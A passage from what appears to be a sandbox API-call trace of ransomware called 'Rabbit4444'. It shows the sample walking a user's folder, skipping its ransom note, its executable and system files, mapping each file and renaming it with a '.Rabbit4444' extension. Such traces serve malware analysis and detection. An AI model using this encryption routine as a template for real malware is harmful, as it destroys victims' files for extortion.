lpString2=".dll") returned 1 [0068.092] lstrlenW (lpString=".lnk") returned 4 [0068.092] lstrcmpiW (lpString1="B0B}", lpString2=".lnk") returned 1 [0068.092] lstrlenW (lpString=".ini") returned 4 [0068.092] lstrcmpiW (lpString1="B0B}", lpString2=".ini") returned 1 [0068.092] lstrlenW (lpString=".sys") returned 4 [0068.092] lstrcmpiW (lpString1="B0B}", lpString2=".sys") returned 1 [0068.092] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8e1a4c76-0757-46cc-ac4a-23b132f1bb0b}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.092] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.092] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15940303389) returned 1 [0068.092] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0068.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0068.092] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.094] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.094] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.095] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15940568776) returned 1 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0068.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0068.095] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.095] CloseHandle (hObject=0x29c) returned 1 [0068.095] CloseHandle (hObject=0x280) returned 1 [0068.095] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}.Rabbit4444") returned 156 [0068.095] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8e1a4c76-0757-46cc-ac4a-23b132f1bb0b}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8e1a4c76-0757-46cc-ac4a-23b132f1bb0b}.rabbit4444"), dwFlags=0x1) returned 1 [0068.096] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38198bf3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38198bf3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x449790fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", cAlternateFileName="{8FEFF~1")) returned 1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="Rabbit4444.exe") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2=".") returned 1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="..") returned 1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="windows") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="bootmgr") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="pagefile.sys") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="boot") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="ids.txt") returned -1 [0068.096] lstrcmpiW (lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}", lpString2="NTUSER.DAT") returned -1 [0068.096] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8FEFF271-6986-41E3-9230-E590CBB9A05D}" | out: lpString1="{8FEFF271-6986-41E3-9230-E590CBB9A05D}") returned="{8FEFF271-6986-41E3-9230-E590CBB9A05D}" [0068.096] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8FEFF271-6986-41E3-9230-E590CBB9A05D}", dwFileAttributes=0x0) returned 1 [0068.097] lstrlenW (lpString="{8FEFF271-6986-41E3-9230-E590CBB9A05D}") returned 38 [0068.097] lstrlenW (lpString="Rabbit4444") returned 10 [0068.097] lstrcmpiW (lpString1="0CBB9A05D}", lpString2="Rabbit4444") returned -1 [0068.097] lstrlenW (lpString=".dll") returned 4 [0068.097] lstrcmpiW (lpString1="05D}", lpString2=".dll") returned 1 [0068.097] lstrlenW (lpString=".lnk") returned 4 [0068.097] lstrcmpiW (lpString1="05D}", lpString2=".lnk") returned 1 [0068.097] lstrlenW (lpString=".ini") returned 4 [0068.097] lstrcmpiW (lpString1="05D}", lpString2=".ini") returned 1 [0068.097] lstrlenW (lpString=".sys") returned 4 [0068.097] lstrcmpiW (lpString1="05D}", lpString2=".sys") returned 1 [0068.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8FEFF271-6986-41E3-9230-E590CBB9A05D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8feff271-6986-41e3-9230-e590cbb9a05d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.097] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.097] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15940814475) returned 1 [0068.097] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0068.098] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.103] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.104] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.104] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.104] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.105] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.105] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15941565020) returned 1 [0068.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0068.105] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.105] CloseHandle (hObject=0x29c) returned 1 [0068.105] CloseHandle (hObject=0x280) returned 1 [0068.105] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8FEFF271-6986-41E3-9230-E590CBB9A05D}.Rabbit4444") returned 156 [0068.105] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8FEFF271-6986-41E3-9230-E590CBB9A05D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8feff271-6986-41e3-9230-e590cbb9a05d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8FEFF271-6986-41E3-9230-E590CBB9A05D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8feff271-6986-41e3-9230-e590cbb9a05d}.rabbit4444"), dwFlags=0x1) returned 1 [0068.106] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x381e50b0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381e50b0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x449790fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90D3E932-8AF8-49E8-98F5-070B13F94403}", cAlternateFileName="{90D3E~1")) returned 1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="Rabbit4444.exe") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2=".") returned 1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="..") returned 1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="windows") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="bootmgr") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="pagefile.sys") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="boot") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="ids.txt") returned -1 [0068.106] lstrcmpiW (lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}", lpString2="NTUSER.DAT") returned -1 [0068.107] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{90D3E932-8AF8-49E8-98F5-070B13F94403}" | out: lpString1="{90D3E932-8AF8-49E8-98F5-070B13F94403}") returned="{90D3E932-8AF8-49E8-98F5-070B13F94403}" [0068.107] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{90D3E932-8AF8-49E8-98F5-070B13F94403}", dwFileAttributes=0x0) returned 1 [0068.107] lstrlenW (lpString="{90D3E932-8AF8-49E8-98F5-070B13F94403}") returned 38 [0068.107] lstrlenW (lpString="Rabbit4444") returned 10 [0068.107] lstrcmpiW (lpString1="B13F94403}", lpString2="Rabbit4444") returned -1 [0068.107] lstrlenW (lpString=".dll") returned 4 [0068.107] lstrcmpiW (lpString1="403}", lpString2=".dll") returned 1 [0068.107] lstrlenW (lpString=".lnk") returned 4 [0068.107] lstrcmpiW (lpString1="403}", lpString2=".lnk") returned 1 [0068.107] lstrlenW (lpString=".ini") returned 4 [0068.107] lstrcmpiW (lpString1="403}", lpString2=".ini") returned 1 [0068.107] lstrlenW (lpString=".sys") returned 4 [0068.107] lstrcmpiW (lpString1="403}", lpString2=".sys") returned 1 [0068.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{90D3E932-8AF8-49E8-98F5-070B13F94403}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{90d3e932-8af8-49e8-98f5-070b13f94403}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.107] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.107] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15941823294) returned 1 [0068.108] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0068.108] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.109] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.110] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15942116980) returned 1 [0068.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.111] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0068.111] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.111] CloseHandle (hObject=0x29c) returned 1 [0068.111] CloseHandle (hObject=0x280) returned 1 [0068.111] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{90D3E932-8AF8-49E8-98F5-070B13F94403}.Rabbit4444") returned 156 [0068.111] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{90D3E932-8AF8-49E8-98F5-070B13F94403}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{90d3e932-8af8-49e8-98f5-070b13f94403}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{90D3E932-8AF8-49E8-98F5-070B13F94403}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{90d3e932-8af8-49e8-98f5-070b13f94403}.rabbit4444"), dwFlags=0x1) returned 1 [0068.112] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ae0de76, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9ae0de76, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x449790fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9131B142-76D7-4452-8650-524C6F4D9D07}", cAlternateFileName="{9131B~1")) returned 1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="Rabbit4444.exe") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2=".") returned 1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="..") returned 1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="windows") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="bootmgr") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="pagefile.sys") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="boot") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="ids.txt") returned -1 [0068.112] lstrcmpiW (lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}", lpString2="NTUSER.DAT") returned -1 [0068.112] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{9131B142-76D7-4452-8650-524C6F4D9D07}" | out: lpString1="{9131B142-76D7-4452-8650-524C6F4D9D07}") returned="{9131B142-76D7-4452-8650-524C6F4D9D07}" [0068.112] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9131B142-76D7-4452-8650-524C6F4D9D07}", dwFileAttributes=0x0) returned 1 [0068.112] lstrlenW (lpString="{9131B142-76D7-4452-8650-524C6F4D9D07}") returned 38 [0068.112] lstrlenW (lpString="Rabbit4444") returned 10 [0068.112] lstrcmpiW (lpString1="C6F4D9D07}", lpString2="Rabbit4444") returned -1 [0068.112] lstrlenW (lpString=".dll") returned 4 [0068.112] lstrcmpiW (lpString1="D07}", lpString2=".dll") returned 1 [0068.112] lstrlenW (lpString=".lnk") returned 4 [0068.112] lstrcmpiW (lpString1="D07}", lpString2=".lnk") returned 1 [0068.112] lstrlenW (lpString=".ini") returned 4 [0068.112] lstrcmpiW (lpString1="D07}", lpString2=".ini") returned 1 [0068.112] lstrlenW (lpString=".sys") returned 4 [0068.112] lstrcmpiW (lpString1="D07}", lpString2=".sys") returned 1 [0068.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9131B142-76D7-4452-8650-524C6F4D9D07}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9131b142-76d7-4452-8650-524c6f4d9d07}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.113] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.113] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15942357785) returned 1 [0068.113] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0068.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0068.113] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.114] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.115] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15942611067) returned 1 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0068.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0068.115] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.116] CloseHandle (hObject=0x29c) returned 1 [0068.116] CloseHandle (hObject=0x280) returned 1 [0068.116] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9131B142-76D7-4452-8650-524C6F4D9D07}.Rabbit4444") returned 156 [0068.116] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9131B142-76D7-4452-8650-524C6F4D9D07}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9131b142-76d7-4452-8650-524c6f4d9d07}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9131B142-76D7-4452-8650-524C6F4D9D07}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9131b142-76d7-4452-8650-524c6f4d9d07}.rabbit4444"), dwFlags=0x1) returned 1 [0068.117] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb513da85, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb513da85, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x44c651c8, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", cAlternateFileName="{92B80~1")) returned 1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="Rabbit4444.exe") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2=".") returned 1 [0068.117] lstrcmpiW 